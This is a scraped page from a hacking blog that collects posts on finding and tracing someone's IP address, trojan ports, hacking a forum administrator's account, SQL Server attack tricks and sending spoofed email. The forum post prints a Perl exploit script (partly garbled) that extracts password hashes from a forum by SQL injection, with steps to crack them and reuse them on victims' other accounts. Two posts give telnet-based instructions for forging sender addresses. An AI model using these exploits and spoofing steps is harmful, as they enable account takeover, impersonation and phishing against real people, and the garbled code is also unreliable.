This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name Network Address Allotted

ISP I 203.94.47.xx

ISP II 202.92.12.xx

ISP III 203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you? If yes please send it to me J.

Well now I guess you have pretty good knowledge about what an IP is and what you can do by knowing the IP of a remote system. Now lets come to the point of finding out the IP of remote system.

Well you can easily figure out the IP of a remote system using the netstat utility available in the microsoft’s version of DOS. The netstat command shows the connections in which your system is engaged to and the ports they are using. Suppose you are checking your mail in hotmail and you want to find out the IP of msn. All you need to do is to open a dos window (command.com) and type netstat. You will see all the open connections of your system. There you will see something :

Proto Local Address Foreign Address State

TCP abhisek:1031 64.4.xx.xx:80 ESTABLISHED

Now you got the IP address of hotmail ass 64.4.xx.xx .

Similarly you can figure out the IP address of most http or ftp connections.

To know your own IP type the following command in a dos windows

C:netstat –n

[this commands converts the IP name into IP addresses]

this is what you will probably see on typing the above command :

Proto Local Address Foreign Address State

TCP 203.xx.251.161:1031 194.1.129.227:21 ESTABLISHED

TCP 203.xx.251.161:1043 207.138.41.181:80 FIN_WAIT_2

TCP 203.xx.251.161:1053 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1058 194.1.129.227:20 TIME_WAIT

TCP 203.xx.251.161:1069 203.94.243.71:110 TIME_WAIT

TCP 203.xx.251.161:1071 194.98.93.244:80 ESTABLISHED

TCP 203.xx.251.161:1078 203.94.243.71:110 TIME_WAIT

Here 203.xx.251.161 is your IP address.

Now lets clarify the format used by netstat :

Proto : It shows the type of protocol the connection with the remote system is using.

Here TCP (transmission control protocol) is the protocol used by my system to connect to other systems.

Local Address : It shows the local address ie the local IP. When the netstat command is executed without –n switch then the name of the local system is displayed and when the netstat is executed with –n switch then the IP of the local system is displayed. Here you can also find out the port used by the connection.

xxx.yyy.zzz.aaa:1024

in this format you will see the local address. Here 1024 is the port to which the remote system is connected in your system

Foreign Address :: It shows the IP address of the remote system to which your system is connected. In this case also if the netstat command is excuted with –n switch then you directly get the IP of the victim but if the netstat is executed without –n switch then you will get the address of the remote system. Something like

C:netstat

Proto Local Address Foreign Address State

TCP abhisek:1031 msgr.lw4.gs681.hotmail.com:80 ESTABLISHED

Here msgr.lw4.gs681.hotmail.com is the address of the foreign system . putting this address in any IP lookup program and doing a whois lookup will reveal the IP of the remote system.

Note: The port to which your system is connected can be found from this in the same way as I have shown in the case of local address. The difference is that, this is the port of the remote system to which your computer is connected to.

Below I have produced a list of ports and popular services generally found to be running.

21 :: FTP port

80 :: http port

23 :: Telnet port

Note: If your execute the netstat command and find ports like 12345,27374 are open and are in use then make it sure that your sweat heart computer is infected with her boyfriend.. J J J J I mean your computer is infected with some sort of Trojan.

Below I have produced a list of commonly known Trojans and the ports they use by default. So if you find these ports open then get a good virus buster and get these stupid servers of the Trojans kicked out. Well if you want to play with these Trojan by keeping them in your computer but not letting them ruin your system performance then just disble it from the system registry run and they wont be loaded to memory each time when windows starts up[This trick doesn’t work for all Trojans].

Netbus :: 12345(TCP)

Subseven :: 27374(TCP)

Girl Friend :: 21554(TCP)

Back Oriface :: 31337 (UDP)

Well guys and gals I hope you are now well familiar with the term IP and what is the utility of IP in cyber world and how to get the IP of a remote system to which you are connected. I hope you find my writings very easy to undertstand. I know I lack the capacity of explaining myself but I try my level best to make things very easy and clear for you’ll.

How to get the IP of a remote system while chatting through msn messenger ::

This is a tutorial on how to get IP address from MSN messenger. This is actually
a really easy thing to do. It is not like going through the hard time and reversing
MSN messenger like many people think.

The IP address is only given when you accept or are sending a file through MSN
messenger. When you send IM’s, the message is sent through the server thus hiding
your victims IP and your. But when you send a file or recieve a file, it is direct
connection between the two computers.

To obtain the IP accept a file transfer or send a file to the victim, when the file
sending is under way from the dos prompt type “netstat” without the quotation marks.
You should get a table like this:

Proto Local Address Foreign Address State
TCP kick:1033 msgr-ns29.msgr.hotmail.com:1863 ESTABLISHED
TCP kick:1040 msgr-sb36.msgr.hotmail.com:1863 ESTABLISHED
TCP kick: ESTABLISHED

The top name in the list is the server’s address for IMing. There could be many of
the second name in the list, as a new connection is made to the server for every
room you are IMing to. You are looking for the address of the remote host in
this table it may be something similar to “host63-7-102-226.ppp.cal.vsnl.com” or “203..64.90.6”.
without the quotation marks.
All you need to do now is to put this address in you IP lookup programe and get the IP of the remote system.

Well 50%of the work is done now. Now you know how to get the IP of a remote system, so its time to trace it down and find some details about the IP.

Tracing an IP is quite simple. You can do it the easy way by using some sweet softwares like Visual Trace 6.0b

[ftp://ftp.visualware.com/pub/vr/vr.exe]

Neotrace

[http://www.neoworx.com/download/NTX325.exe]

or by our way ie. Using MS DOS or any other version of DOS.

Well I suggest you to use DOS and its tracert tool for tracing the IP cause using it will give you a clear conception about the art of tracing an IP and I guarantee that you will feel much satisfied on success than using a silly software. Furthur you will know how things work and how the IP is traced down and the different networks associated in this tracing process.

Let us take a look at tracert tool provided for DOS by Microsoft.

It is a very handy tool for peoples need to trace down an IP.

Just open any DOS windows and type tracert.

C:windows>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:

-d Do not resolve addresses to hostnames.

-h maximum_hops Maximum number of hops to search for target.

-j host-list Loose source route along host-list.

-w timeout Wait timeout milliseconds for each reply.

You will now see a description of the tracert command and the switches associated with it.

Well these switches doesn’t makes much difference. All you can do is to increase the timeout in milliseconds by using –w switch if you are using a slow connection and the –d switch if you wish not resolve address to hostnames by default.

By default tracert performs a maximum of 30 hops trace. Using the –h switch you can specify the number of hops to perform.

Now its time for execution.

Let us trace down the IP yahoo.com [216.115.108.243]

TIP: If you have done a long research (I mean a lot) then simply looking at the IP you can figure out some info from it. For example the IP 203.90.68.8 indicates that the system is in India. In India IPs generally begin with 203 and 202

C:WINDOWS>tracert yahoo.com

Tracing route to yahoo.com [216.115.108.243] over a maximum of 30 hops:

1 308 ms 142 ms 127 ms 203.94.246.35

2 140 ms 135 ms * 203.94.246.1

3 213 ms 134 ms 132 ms 203.94.255.33

4 134 ms 130 ms 129 ms 203.200.64.29

5 122 ms 135 ms 131 ms 203.200.87.75

6 141 ms 137 ms 121 ms 203.200.87.15

7 143 ms 170 ms 154 ms vsb-delhi-stm1.Bbone.vsnl.net.in [202.54.2.241]

8 565 ms 589 ms 568 ms if-7-0.bb8.NewYork.Teleglobe.net [207.45.198.65]

9 596 ms 584 ms 600 ms if-3-0.core2.NewYork.teleglobe.net [207.45.221.66]

10 * * * Request timed out.

11 703 ms 701 ms 719 ms if-3-0.core2.PaloAlto.Teleglobe.net [64.86.83.205]

12 694 ms 683 ms 681 ms if-6-1.core1.PaloAlto.Teleglobe.net [207.45.202.33]

13 656 ms 677 ms 700 ms ix-5-0.core1.PaloAlto.Teleglobe.net [207.45.196.90]

14 667 ms 673 ms 673 ms ge-1-3-0.msr1.pao.yahoo.com [216.115.100.150]

15 653 ms 673 ms 673 ms vl20.bas1.snv.yahoo.com [216.115.100.225]

16 666 ms 676 ms 674 ms yahoo.com [216.115.108.243]

Trace complete.

Note: Here I have traced yahoo.com. In place of yahoo.com you can give the IP of yahoo or any other IP you want to trace, the result will be the same.

Now carefully looking at the results you can figure out many information about yahoo’s server [216.115.108.243]

First packets of data leave my ISP which is at 203.94.246.35 .Similarly you can find out the different routers through which the packets of data are send and received to and from the target system. Now take a look at the 13th line you’ll see that the router is in PaloAlto.Teleglobe.net from this you can easily figure out that the router is in Palo Alto. Now finally look at the target system ie. Yahoo’s server vl20.bas1.snv.yahoo.com . Now you got the address of yahoo’s server. Now put this address in any IP lookup programe and perform and reverse DNS lookup and you will get most of the info about this address,like the place where it is in.

Well another thing you can find out using the tracert tool is that the number of hops (routers) the target system is away from you. In case of tracerouting yahoo.com we find that the target system ie yahoo’s server is 16 hops away from my system. This indicates that there are 16 routers between my system and yahoo’s server.

Apart from tracing an IP you can find out many usefull details about the target system using the tracert tool.

Firewall Detection

While tracerouting a target system, if you get * as an output then it indicates timeout error. Now if you peform another tracerout to the same taeget system at some other time with a good connection and in this way few times more and if you always get * as the output then take it for sure that the target system is running a firewall which prevents sending of data packets from the target system.

Example

Some days ago I tried to tracert hotmail’s server in plain and simple way using tracert without any trick.This is what I found out :

c:windows>tracert 64.4.53.7

Tracing route to lc2.law5.hotmail.com [64.4.53.7]

over a maximum of 30 hops:

1 * * * Request timed out.

2 161 ms 147 ms 85 ms 203.90.69.81

3 126 ms 261 ms 219 ms 203.90.66.9

4 121 ms 115 ms 228 ms delswp2.hclinfinet.com [203.90.66.133]

5 727 ms 725 ms 711 ms 203-195-147-250.now-india.net.in [203.195.147.250]

6 1006 ms 794 ms 952 ms core-fae-0-0.now-india.net.in [203.195.147.3]

7 826 ms 731 ms 819 ms 213.232.106.9

8 885 ms 744 ms 930 ms 213.166.3.209

9 851 ms 1020 ms 1080 ms 213.232.64.54

10 1448 ms 765 ms 1114 ms pos8-0.core2.London1.Level3.net [212.113.0.118]

11 748 ms 789 ms 750 ms ge-4-2-1.mp2.London1.Level3.net [212.187.131.146]

12 719 ms 733 ms 846 ms so-3-0-0.mp1.London2.Level3.net [212.187.128.46]

13 775 ms 890 ms 829 ms so-1-0-0.mp2.Weehawken1.Level3.net [212.187.128.138]

14 853 ms 852 ms 823 ms so-3-0-0.mp1.SanJose1.Level3.net [64.159.1.129]

15 889 ms 816 ms 803 ms so-7-0-0.gar1.SanJose1.Level3.net [64.159.1.74]

16 * * * Request timed out.

17 * * * Request timed out.

18 * * * Request timed out.

19 * * * Request timed out.

20 * * * Request timed out.

21 * * * Request timed out.

22 * * * Request timed out.

23 * * * Request timed out.

24 * * * Request timed out.

25 * * * Request timed out.

26 * * * Request timed out.

27 * * * Request timed out.

28 * * * Request timed out.

29 * * * Request timed out.

30 * * * Request timed out.

Trace complete.

I performed the same tracert many times a day but concluded with the same result. This indicates that the systems after the router SanJose1.Level3.net has firewalls installed which prevents the outgoing of data packets.

Detecting Traceroute Attempts on your System

You can detect that an attacker is performing a traceroute on your system, if you see the following symptoms:

1. If you observe port scans on very high UDP ports. This symptom means that the attacker has performed a traceroute on your system. However, it could also mean a simply port scan. Either way, it signifies the fact that your system is being scanned.

2. If the packet-monitoring tool installed in your network, picks up several outgoing TTL-exceeding messages, then it is yet another sign that someone is doing a traceroute on your system.

3. If in these log files, you also observer an outgoing ICMP port unreachable error message, then it means that since a traceroute was done on your system and as the target system i.e. your system, was reached, it responded with this error message.

You can also find our more information on the attacker (if he performs a traceroute on your system) by simply studying the sniffer log files. If you observer the TTL values, then we can easily figure out the following information on the attacker by making use of OS detection techniques discussed earlier in this white paper:

The Operating System running on the attacker’s target system.
Number of hops away, the attacker is from you.

OKI DOKI Buddys that’s all for this article. Hope you will find this article very easy to understand and implement.
Surely Comment here Okzz!!

Open It

How to HACK into FORUMS

2 comments

This is what you like to call "Hacking a forum".
I call it "Cracking into a forum" ... Learn what hacking means you lazy f*cks, lol...
Note: How Hackers Hack into forum slowly, everything they do, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be referring to it as "hackingsite".

So you've got your target. You know the forum to want to hack, but how? Let's find the user we want to hack. Typically, you'd want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be "1". Find the User ID of the administrator, or person you wish to hack. For this tutorial, let's say his/her ID is "2".
Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of "hackingsite", which is User ID "2".
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don't have it, here:

CODE

#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
##################################################################
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < j="0;" current =" $charset[$j];" sql =" (" cookie =" ('Cookie'"> $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < member_id=" . $user . " pass_hash="">

What the f*ck,Pretty confused, aren't you? What the f*ck are you supposed to do with this shit?! I'll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.
How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.
Your going to want to go and get ActivePerl. I am sure it's here somewhere in Appz.
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".
So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your desktop, into "bin".
Alrighty. Now everything is fine, and you're ready to Pwn some FAGS ...
What your going to want to do now, is open up your command prompt. If you don't know how, please quit this site, and die.... Start - Run - CMD
Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:
perl ipb.pl
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don't be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person's password, encrypted using the MD5 algorithm. I urge you to do a quick read-up on MD5 hash's before continuing reading.
Done? You understand the very basics of MD5s? Good. You're probably thinking: I just read that MD5 hashes cannot be cracked!
LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.
There are many places online where you can enter hashes to be cracked. Personally, I use "Cain & Able", which is a great MD5 cracker available at 'http://odix.it'.
You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.
CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account.
But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call "GOOGLE"

Open It

TOP 10 TRICKS TO EXPLOIT SQL SERVER SYSTEMS

2 comments

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
sql hacker fig1
Figure 1: Common SQL injection vulnerabilities found using WebInspect.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.

Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.

Open It

Fake Emails Or Email Spoofing in DOS

0 comments

Well, let's get started then. Well in order to fake (spoof) an email, you first need to have an SMTP (Simple Mail Transfer Protocol) server that you can use to send the email from. How do you find one? Simple

First decide what server you want to use to send email from, for this example I will use Hotmail. Now go to Start --> Run --> Type the word 'cmd' without the '
Now that you have DOS open, type the following command:

nslookup -querytype=mx hotmail.com

You can replace hotmail.com with whatever site's mail servers you want to use. Anyway, when you execute that command, the following output comes out:

Non-authoritative answer:
hotmail.com     MX preference = 5, mail exchanger = mx2.hotmail.com
hotmail.com     MX preference = 5, mail exchanger = mx3.hotmail.com
hotmail.com     MX preference = 5, mail exchanger = mx4.hotmail.com
hotmail.com     MX preference = 5, mail exchanger = mx1.hotmail.com

The SMTP servers are mx2.hotmail.com, mx3.hotmail.com, etc. Now, for the next part of the tutorial, I will be using mx2.hotmail.com.

Now, let's get started spoofing the actual email! You still have DOS open right, good. Now type the following command to connect with Hotmail's SMTP server. You can replace the server name with your preferred server.

telnet mx2.hotmail.com 25

You will see whatever welcome message they give. Now type the following command:

HELO

You'll get a message, usually with your IP. Now the next command shows what email you want to pretend to be sending from. I'll use the fake email lala@lala.org

MAIL FROM: lala@lala.org

You should get a 250 OK. Now we will type a command to choose who we want the email to go to. I will use the fake email blah@blah.com

RCPT TO: blah@blah.com

Now you get another 250 OK. Now we will start the actual message. Type:

DATA

Then type your message. Be sure to add title headers, like Subject, To, From, etc. so the email looks real. After you are done typing the email, press Enter, then type a . then press Enter again. Your email has been sent!

Now type quit to end the connection to the server.

That's all for now, hope you learned something!

Open It

How To: SEND FAKE EMAILS [Email spoofing]

2 comments

So, you want to learn how to send your own fake mail? It's extraordinarily easy to do, and requires no extra software installed on your PC at all. It can be done with Windows, Macintosh, Linux - any modern PC that has an internet connection will do it.

There are a just a few simple steps. First, you'll need to decide on the FROM and the TO email addresses. If the FROM address that you're choosing isn't a real one, make sure that the domain name(the bit after the @ sign) is a real one. If it's not a real one, it almost certainly won't work.

For the purpose of this tutorial, we'll be sending from bush@whitehouse.gov to dummy@anysite.com.

Second, you'll need to find out the mail server that your recipient is using.

Click Start, Run, enter "CMD", then press OK. In the window that comes up, type nslookup -q=MX anysite.com

Go to Applications, Utilities, and choose Terminal. In the window that comes up, type nslookup -q=MX anysite.com

Bring up your favorite shell, and type nslookup -q=MX anysite.com

There will be a lot of information on the screen - all you need to look for is a line that talks about a mail exchanger. If there are several, pick the one with the lowest "preference number".

anysite.com        MX preference = 10, mail exchanger = mail.anysite.com

Now, you'll need to connect to this mail exchanger using telnet. This is the same for any PC, but Vista users may not have it installed by default - see this note about getting telnet on Vista before you continue. When you're ready, type:

telnet mail.anysite.com 25

Press enter, and after a short pause, you should see a welcome message from the server.

Ok, so now you're connected. You need to enter the following information - press ENTER at each new line. You won't be able to press backspace to delete a mistake, so you'll need to type everything correctly first time!

HELO whitehouse.gov

This tells the mail server that we are "whitehouse.gov".

MAIL FROM: </BUSH@WHITEHOUSE.GOV>

This tells the server who is sending the mail.

RCPT TO: </DUMMY@ANYSITE.COM>

This tells the server who to deliver the mail to. At this point, if the recipient doesn't exist, you may see a warning message (but not always).

DATA

This tells the server that we're ready to start writing our message. It should acknowledge, telling you to end your message with a full stop (period) on a single line. All we need to do now, is write our message and don't forget that full stop at the end.

Hello dummy@anysite, I managed to send a fake mail all by myself!
.

Dont forget that last dot. When you've done that, and pressed enter, simply enter QUIT and your mail should be delivered.

There's a little bit more to it, of course. You'll need to enter proper "headers" if you want the mail to look more believable. After doing the DATA command, I'd recommend pasting in the following "headers" to make sure it looks realistic when viewed in Outlook, Hotmail, etc.

Date: Sun, 01 Apr 2007 12:49:13 +0100 (BST)
From: George W Bush 
To: Poor Sod 
Subject: Fake mail

Hello dummy@anysite, I managed to send a fake mail all by myself!
.
</DUMMY@ANYSITE.COM></BUSH@WHITEHOUSE.GOV>

And that's all there is to it.

Check Out This also : Email Spoofing in DOS

Open It

BlackHat security

Welcome to My Website

How to hack myspace private profile/account passwords

Crack Windows Password Instantly

Certified Ethical Hacker Certification Training Videos

How to Hack a MySpace Account

1. HOW TO HACK MYSPACE – The Easiest Way

1. HOW TO HACK MYSPACE – The Easiest Way

2. HOW TO HACK MYSPACE – Other Ways

Software to Hack computer remotely : RAT (Remote Access Trojan)

RATs :

Working of RATs:

Things you can do by hacking computer remotely:

Disadvantage of remote hacking software RAT:

Hack account password with Ardamax keylogger- a powerful spy software...

Hack Windows XP administrator account

Hacking Password Protected Websites

Hacking Sylabus[Ethical]

Haking "Admin" from "User" mode & more[XP]

Changing your MAC/IP on Windows XP

IP Address Hacking

How to HACK into FORUMS

TOP 10 TRICKS TO EXPLOIT SQL SERVER SYSTEMS

Fake Emails Or Email Spoofing in DOS

How To: SEND FAKE EMAILS [Email spoofing]

Labels